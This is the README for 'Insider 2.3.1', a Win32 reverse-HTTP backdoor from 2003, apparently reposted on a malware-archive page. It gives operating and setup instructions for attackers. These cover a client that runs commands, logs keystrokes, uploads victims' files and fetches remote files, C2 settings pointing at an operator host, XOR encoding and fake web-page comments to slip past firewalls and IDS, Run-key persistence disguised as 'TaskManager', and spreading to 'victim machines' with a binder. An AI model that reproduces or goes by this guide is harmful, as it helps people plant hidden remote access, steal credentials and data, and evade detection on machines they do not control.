Insider 2.3.1
(Backdoor.Agent.ae)

by Nick

Written in C, compressed with UPX, source included

Released in September 2003

more versions


The Insider V2.3.1 -- Win32 reverse backdoor
==========================================


Introduction
============

This is a reference implementation of win32 reverse backdoor program called the Insider.
Unlike many other backdoor programs, Insider is not server listening some tcp/udp port, 
it is a client program that communicates with the server part through http protocol. 
This design has some unique features:

- Pass through almost any corporate firewall (it can automatically detect proxy settings if needed)
- No listening services found with "netstat -an"
- Easy to hide from IDS - communication seems like a normal web browsing
- Web interface for client management

Insider network consists of the following parts:

- Client(s) on victim machine(s)
- 2 cgi scripts: a driver script "cc.cgi" that communicates with the clients
  and a script "master.cgi" that gives a user interface to Insider network.

Client is a simple win32 program that is distributed on victim machine in some way - send some executable to victim,
 do some ActiveX tricks, whatever.
The client features:

- Automatic http proxy detection
- Automatic proxy authentication
- System command execution
- File download/upload
- Simple keylogger (NT/2000/XP only)
- Uninstallation
- OS shutdown/reboot

The cgi part can be installed on any server that can execute perl cgi scripts - 
anonymous hosting service should be fine.

Operation
=========

Clients are identified with a unique 32-character id which is sent to server every time the client has something to say.
This gives you a quite scalable network of clients (I guess that the cgis won't scale that good, though..).
Because it may be a bit odd to handle the clients as md5 strings, the cgis provide an additional mechanism for naming,
 aliastable. See the format of this file below in section Installation, section 3.

After the initial execution, client finds out some settings from registry and sends the following information to server:

User: Login (Real name)
Logon domain: Domainname
Location: Company (Country)
System: Operating system (Service pack)
Connection: Connection type

After that, it waits for a predefined time between MIN and MAX (see insider.h) and loops forever waiting for new commands and executing them.
Commands are passed directly to the system command interpreter (cmd.exe or command.com).

In addition to that, following built-in commands are defined in this version:

cd <dir>		Change current directory. Initial cd is defined in insider.h (#define STARTDIR)

download <file>		Download file from client. The file appears in 
			"Downloaded files" section in master.cgi if successful.
			NOTE: the file is read in the memory before sending.
			Several megs should be ok, but that iso image is not..
			Example: dowload c:\files\classified.txt

exit			Shutdown the client (only Insider, not the OS!).

fetch <url>		Fetch file from http server and store it as local file.
			Url is a normal http url, for example http://server/file.zip.
			File is saved in the current directory.
			NOTE: the file is read in the memory before saving.

info			Send initial information again.

logstart <file>		Start built-in keylogger (NT/2000/XP), log to file.
			If the file is empty, log in file defined in insider.h 
			(#define KEYLOG).
			Example: logstart c:\key.dat

logstop			Stop keylogger.

pwd			Show current directory.

reboot			Reboot the operating system.

uninstall		Uninstall the client. This command removes the registry
			value defined in insider.h (#define REGRUN) and places "del client.exe" in RunOnce registry
			key (client.exe is	the actual client binary name in REGRUN).

shutdown		Shutdown the operating system.

timeout <min-max>	Set the polling time random between min and max seconds.
			Default is 60-300 secs. Use something like 10-20 secs when	working with the client.
			Example: timeout 20-30

These are the commands you type in "Pending command" input field in
master.cgi. The command results are presented in black window below the command
input field. Only the output is directed, do not use commands that require
interactive input. If your program need input, use piping (| or <).

If defined, the client logs some information in text file. To enable this, you
must edit the file insider.h (see below). This is not normally required (and not
recommended, since it leaves a visible trace on victim machine) but you may want
to try it out in lab when preparing your clients. The server part logs information
in file defined in cc.cgi (see below). This file has the following format:

Sun Aug  3 09:07:06 2003 client=xxxxxx, result=0
Sun Aug  3 09:07:09 2003 client=yyyyyy, result=0
Sun Aug  3 09:07:15 2003 client=zzzzzz, cmd=netstat -rn, result=0
Sun Aug  3 09:07:20 2003 client=zzzzzz, result=1

client is the client in question, cmd is the command sent to client (when there
is one) and result indicates that there was some data in result (1, or 0 if not).
In the example above, client zzzzzz asks for command and is returned "netstat -rn".
Five seconds later it returns something (result=1). Clients xxxxxx and yyyyyy are
just polling.



Installation
============

1. Edit file insider.h (or use precompiled binary in.exe, see section 2.)

- Change HOST, PORT and URL to that of your cgi:

/* Default host and port */
#define HOST    "someserver.com"
#define PORT    80

/* Base URL */
#define URL     "/cgi-bin/cc.cgi";

- Also, it might be a good idea to change the default prefix:

/* Comment prefix */
#define PREFIX  "StartJavaScript="

- If you want to encode commands and results, use

#define ENCODE 1
#define PASSWORD "YourPasswordHere"

This is done by xoring the text with the password. Not enough for secure communication but enough to make
things a bit harder for NIDS, like snort. Note that this feature is available only in versions 1.1.0+ and 2.1.0+.
If your client is below this version and the server is above, use ENCODE 0 (and vice versa).

- If you want to debug, edit

/* Debug ? */
#define DEBUG		0
#define LOGFILE		"C:\\windows\\wintask.log"

(note the double \\ in pathname).


- If you want to uninstall the client cleanly, define the Run registry key:

/* Uninstallation registry parameters */
#define REGHIVE		HKEY_LOCAL_MACHINE
#define REGKEY		"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
#define REGVAL		"TaskManager"

(of course, your installer must write that registry value..)



2. Run compile.bat (you need MS Visual C to do this).

- You should now have a binary insider.exe, size about 56K. Pack the file
if feel like it (upx can squeeze it in 28K).

NOTE: You can also use the precompiled binary file in.exe and configure
the client using the following registry keys:

HKCU\Software\Microsoft\TaskManager\Host
HKCU\Software\Microsoft\TaskManager\Port
HKCU\Software\Microsoft\TaskManager\URL
HKCU\Software\Microsoft\TaskManager\Prefix
HKCU\Software\Microsoft\TaskManager\Password

In that case, you must write the above registry keys somehow in the installation process.
You can always rename in.exe if you wish.



3. Prepare your cgis

- Edit the variable $prefix in cc.cgi to fit your clients

- Edit the variable $basedir in cc.cgi and master.cgi. Make sure that the web
server can write to that directory. Both cc.cgi and master.cgi try to create the
dir if it doesn't exist.

- Edit $encode and $password in cc.cgi:

# Use content encoding? (0 = no, 1 = yes)
$encode = 1;

# Encoding password (use if $encode = 1)
$password = "YourPasswordHere";


- Edir $logfile in cc.cgi, and make sure that the server can write to that file

- Take some web page and cut that in two parts, called header.txt and footer.txt. 
  The command is inserted as a base64-encoded message in comment field between the two parts:

(header.txt)
<!-- (command) -->
(footer.txt)

Of course, it could be as simple as a bare "<!-- (command) -->", but you might
want to make look like someone is browing your web site with a real content. 
You define these two files in cc.cgi, for example:

$header = "/var/www/cgi-bin/header.txt";
$footer = "/var/www/cgi-bin/footer.txt";


- Edir $alias variable in both cc.cgi and master.cgi (optional)

The format of this file is as follows:

#
# This is a comment
# Left side of the ":" char is the md5 string, right side is the alias
#

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:Client a
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:Client b
....
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:Client n

Now, both cc.cgi and master.cgi can handle the clients with an alias name
on the right side of the table instead of the 32-char md5 string on left side.
$alias must be readable to web server.


- Copy cc.cgi and master.cgi to web server.

- Make sure that the web server can execute the scripts

Some notes:

- File download feature copies the downloaded files in directory
$basedir/client/files/ - this may not work if $basedir resides under /cgi-bin/
If you don't know what I'm talking about, just use the supplied $basedir, it should work with apache..


4. Distribute

- example binder/installer is included in directory "binder".


5. Connect your browser to address https://server/dir/master.cgi (try to
use https whenever possible!!!!) and wait for your clients to appear.


6. Use your imagination.........


nick


Insider:
size: 29.184 bytes

MegaSecurity